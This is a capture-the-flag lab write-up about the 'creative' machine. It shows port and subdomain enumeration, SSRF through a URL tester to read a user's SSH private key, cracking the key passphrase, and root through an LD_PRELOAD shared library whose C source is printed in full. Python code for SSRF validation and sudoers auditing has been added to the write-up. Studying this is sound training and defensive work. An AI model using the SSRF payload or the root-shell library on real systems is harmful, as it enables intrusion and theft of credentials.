This challenge focuses on Server-Side Request Forgery (SSRF), used here to illicitly access system files and internal resources; on testing for SSRF with automated tools such as SSRFmap and ffuf; and on Linux privilege escalation methods such as manipulating the LD_PRELOAD environment variable to override standard library functions and attain elevated privileges.
Running Nmap
┌──(kali㉿kali)-[~/thm/creative]
└─$ sudo nmap -T4 --min-rate 1000 -sC -sV -p- -oN nmap_report 10.10.251.164
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 15:37 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.48% done; ETC: 15:39 (0:01:51 remaining)
Nmap scan report for creative.thm (10.10.251.164)
Host is up (0.32s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Creative Studio | Free Bootstrap 4.3.x template
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.87 seconds
Adding the domain name to the /etc/hosts file
New sub-domain named beta.creative.thm found using ffuf
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://creative.thm/" -H "Host:FUZZ.creative.thm" -fl 8
Updated /etc/hosts file
URL Tester App Found On the beta.creative.thm subdomain
Note: A server's URL tester functionality can introduce Server-Side Request Forgery (SSRF) vulnerabilities. Because the server fetches URLs on behalf of users, it can be manipulated into probing internal network resources, including open ports on the server itself (localhost) or on other hosts reachable only from the internal network.
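The mitigation side of that note, as an added example that is not part of the original writeup: a URL validator for a URL-tester style endpoint that refuses anything other than plain web URLs on well-known ports, resolves the hostname, and rejects every destination that maps to a loopback, private, link-local or otherwise non-public address (including IPv4-mapped IPv6 and odd spellings like 127.1 that only become loopback after resolution). The policy constants, function names and the injectable `resolver` parameter are assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy for a URL-tester endpoint (assumed values): only web schemes, only
# well-known web ports, and never a destination inside our own network.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host):
    """Resolve a hostname to every IPv4/IPv6 address it maps to (empty list on failure)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_internal(addr_str):
    """True for loopback, RFC 1918/ULA, link-local, multicast, reserved or unspecified addresses."""
    addr = ipaddress.ip_address(addr_str)
    # IPv4-mapped IPv6 (::ffff:127.0.0.1) must be judged by the embedded IPv4 address.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_url(url, resolver=resolve_all):
    """Return (ok, reason). ok is True only when scheme and port are allowed and
    every address the host maps to is public. `resolver` is injectable so the
    check can be exercised offline."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable URL or port"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        # Literal address (IPv4 or bracketed IPv6): judge it directly.
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        # Names, and also odd spellings such as 127.1 or 0x7f000001, go through
        # the resolver so that the address actually connected to is what gets checked.
        addrs = resolver(host)
    if not addrs:
        return False, f"{host!r} does not resolve"
    for a in addrs:
        if is_internal(a):
            return False, f"{host!r} maps to internal address {a}"
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://127.0.0.1:1337/home/saad/.ssh/id_rsa", "http://93.184.216.34/"):
        print(u, check_url(u))
```

Two caveats a practitioner should keep in mind: the fetcher must connect to the address that was vetted (or re-run the check after every redirect hop) rather than re-resolving the name, otherwise a DNS rebinding or an open redirect can walk around the filter; and a deny-list like this is a backstop, so where the product allows it, an allow-list of permitted destinations is the stronger control.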
Checking for SSRF
Step 1 — Capture a POST request to the root of the beta.creative.thm subdomain, send it to Burp Repeater, and then save the request to a file named request.txt
Step 2 — Clone the SSRFmap repository and move the request.txt file to the repo directory
https://github.com/swisskyrepo/SSRFmap
Step 3 — Use the script to enumerate the ports that are open on the internal network with the help of SSRFmap
Using ffuf to find the SSRF vulnerability as an alternative
After running the tools, the results clearly indicate that port 1337 is open on the server's localhost
Exploiting the URL tester app to read the id_rsa file of the user named saad. URL — http://127.0.0.1:1337/home/saad/.ssh/id_rsa
Note — Right click and view page source for a properly edited key file
Trying to logon to the server via SSH with the SSH keys for the user saad
Cracking the id_rsa passphrase with john and gaining shell as saad
Logging in as saad
Credentials found in .bash_history file at /home/saad/ directory
Using sudo -l to enumerate the privileges for the user named saad
Capturing the root.txt flag
Shared libraries, loaded by the dynamic linker (ld.so or ld-linux.so*), are integral to the execution of /usr/bin/ping. These libraries provide the functions and resources ping needs to send and receive network packets. The LD_PRELOAD environment variable can be used to specify additional shared libraries whose functions override the standard set, which modifies ping's behaviour. In this case this can be used to execute arbitrary code and gain a shell on the server as the root user.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid/setuid */

/* Runs when the library is loaded via LD_PRELOAD, before the target's main(). */
void _init() {
    unsetenv("LD_PRELOAD");   /* stop the library from being injected into the spawned shell as well */
    setgid(0);                /* set the group ID to root's */
    setuid(0);                /* set the user ID to root's (the sudo'd process already has the privilege) */
    system("/bin/sh");        /* spawn the shell as root */
}
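As an added defensive check (not part of this writeup or the lab), the following Python audits a sudoers file for the combination that makes the LD_PRELOAD trick above possible: a Defaults line that keeps LD_PRELOAD (or a related loader variable) through env_reset, disables env_reset, or grants setenv, together with a rule that lets a non-root user run something as root. The sudoers text embedded here is a constructed sample, not the machine's real file, and the function names, regexes and the variable list are assumptions for this example.

```python
import re

# Loader variables that let a sudo-run binary load code the caller controls before main().
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*"?([^"]*)"?')
# user  host=(runas) [tags:] commands      e.g.  saad ALL=(root) NOPASSWD: /usr/bin/ping
RULE_RE = re.compile(r"^(\S+)\s+\S+\s*=\s*\(([^)]*)\)\s*(.*)$")

# Constructed sample sudoers for this example; not the lab machine's real file.
SAMPLE_SUDOERS = """\
# Constructed sample
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "LD_PRELOAD"
root    ALL=(ALL:ALL) ALL
saad    ALL=(root) NOPASSWD: /usr/bin/ping
"""


def parse_sudoers(text):
    """Split sudoers text into Defaults lines and (lineno, user, runas, spec) rules.
    Comments and blank lines are skipped; #include directives are not followed."""
    defaults, rules = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("Defaults"):
            defaults.append((lineno, line))
            continue
        m = RULE_RE.match(line)
        if m:
            user, runas, spec = m.groups()
            rules.append((lineno, user, runas, spec.strip()))
    return defaults, rules


def audit_sudoers(text):
    """Return (lineno, kind, message) findings for settings that let the caller's
    environment reach a command run through sudo."""
    findings = []
    defaults, rules = parse_sudoers(text)
    for lineno, line in defaults:
        m = ENV_KEEP_RE.search(line)
        if m:
            for var in sorted(set(m.group(1).split()) & DANGEROUS_ENV):
                findings.append((lineno, "env_keep", f"env_keep preserves {var}"))
        if re.search(r"(?<!!)\bsetenv\b", line):
            findings.append((lineno, "setenv", "setenv lets callers set arbitrary variables"))
        if re.search(r"!env_reset\b", line):
            findings.append((lineno, "env_reset", "env_reset disabled: caller environment passed through"))
    for lineno, user, _runas, spec in rules:
        if "SETENV:" in spec:
            findings.append((lineno, "SETENV", f"SETENV tag on rule for {user}"))
    return findings


def ld_preload_exposure(text):
    """List (user, command spec) for non-root users whose sudo rules can be reached
    with a caller-controlled loader environment."""
    findings = audit_sudoers(text)
    global_leak = any(kind in {"env_keep", "setenv", "env_reset"} for _, kind, _ in findings)
    setenv_lines = {lineno for lineno, kind, _ in findings if kind == "SETENV"}
    _, rules = parse_sudoers(text)
    return [(user, spec) for lineno, user, _, spec in rules
            if user != "root" and (global_leak or lineno in setenv_lines)]


if __name__ == "__main__":
    for lineno, kind, msg in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {lineno}: [{kind}] {msg}")
    print("exposed:", ld_preload_exposure(SAMPLE_SUDOERS))
```

Run it against `sudo cat /etc/sudoers` output (and the files under /etc/sudoers.d) on hosts you administer; the fix for a hit is to drop the loader variables from `env_keep` and leave `env_reset` on, since the default sudo environment scrubbing already removes them.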